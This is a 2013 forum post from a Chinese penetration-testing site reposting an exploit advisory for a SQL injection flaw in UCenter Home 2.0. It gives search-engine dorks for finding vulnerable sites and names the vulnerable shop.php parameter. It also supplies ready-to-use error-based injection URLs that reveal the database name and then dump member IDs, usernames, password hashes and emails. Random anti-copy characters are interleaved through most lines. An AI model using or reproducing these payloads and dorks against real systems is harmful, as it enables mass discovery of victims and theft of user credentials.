中国网络渗透测试联盟

标题: UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability [打印本页]
作者: admin    时间: 2013-2-27 21:31
标题: UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability
: d8 a7 [" o/ r1 F# h/ [" k0 V8 [
__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__  9 o2 m! G, J) `/ B3 k( O2 ?1 h

$ C! S6 b! x8 b) u. w) g4 _                                 
! n- g* |+ b6 B. d
6 `) z& U- A3 w1 W2 q*/ Author : KnocKout  9 {9 `! b; u, t  O

0 Q+ Z) l0 n5 [8 ^# p  b*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers  8 G  f& d, G  d4 Z

( x, `- D8 F" J1 P3 d*/ Contact: knockoutr@msn.com  
0 D3 M2 v6 P1 S7 t" z. F2 p  {/ f; D* d8 }/ g0 G) a- j
*/ Cyber-Warrior.org/CWKnocKout  
4 n: p( U  W( [: D# l% X
0 e: R3 j2 f! |- n__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  
3 P) V7 l2 {. E) ]6 A, p
$ R- d+ L' {. d* P# \- U9 r' t4 tScript : UCenter Home  
# x- M' Y* r8 m9 y8 b8 c. y6 ~0 l
Version : 2.0  
- ]* n. V& P6 c$ R# M2 P# I& |1 y3 e$ _; D& @' Y$ @/ Q( P; C* q
Script HomePage : http://u.discuz.net/  
1 l7 p$ B& F3 B: e
) k- ?' H" k* a' T__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  : F% b) ~9 N  b* x- E" g
  Y( ~" E7 v+ Z6 T$ _
Dork : Powered by UCenter inurl:shop.php?ac=view  * Y; r; d  }' C) c
) }! g5 c  y( }- D1 f" h9 C
Dork 2 : inurl:shop.php?ac=view&shopid=  
0 t3 l5 q: N* s% O: X  d' N5 }7 L1 `' d. L6 ?( v
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  
9 n# x" C" W# C3 V( F" ]* L. n# I9 `
Vuln file : Shop.php  # m3 h/ A' @1 c. Z+ f
( y& p" g: A5 `7 g$ r
value's : (?)ac=view&shopid=  3 S* P0 I/ e/ s2 O. U7 r9 x& _& y
5 `/ T" r( a+ D( H; l
Vulnerable Style : SQL Injection (MySQL Error Based)  
; d- i! u2 k  q. y
4 N6 ]. q* L9 sNeed Metarials : Hex Conversion  
/ B2 m. v8 T8 I4 K8 {" E$ a7 j; a0 u9 }5 ?$ n0 q
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  
! r9 r) Y- i( d+ O( q: k& U8 y: L/ S. g/ F4 V6 g
Your Need victim Database name.   
' S' |* ^' q: t; V2 }+ V2 |+ e2 f% ^
for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1  + c1 Q- N+ Q- D  J1 Y
, T5 z/ ?( o2 ^, Y- h
..  ( i1 k' x& l  h( v
" p4 a$ _: B. |! D
DB : Okey.  . _4 z9 V, d$ b! }6 U8 e
5 O6 N! R" {/ [+ w- f
your edit DB `[TARGET DB NAME]`  : V& C9 ?2 D7 a4 c- v

3 m% Z# F% e  Q" e/ |. AExample : 'hiwir1_ucenter'  / ~4 _( q: `) z0 |" {4 x/ _

# [1 A5 q' ?, }- h6 R) M' _+ ~0 BEdit : Okey.  % U8 _# p4 [3 @4 G: x, J

( Q2 d9 e' ~' n8 J0 A9 V1 VYour use Hex conversion. And edit Your SQL Injection Exploit..  * {! F+ d6 g5 A, ~' m7 w9 }

" B" D  b: j1 S8 b, h   # q" w- b' }4 Q8 I5 v% Z' |

+ @2 e8 W3 Z* AExploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1  4 M3 V* U9 \6 P! R* K2 r* H0 K




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2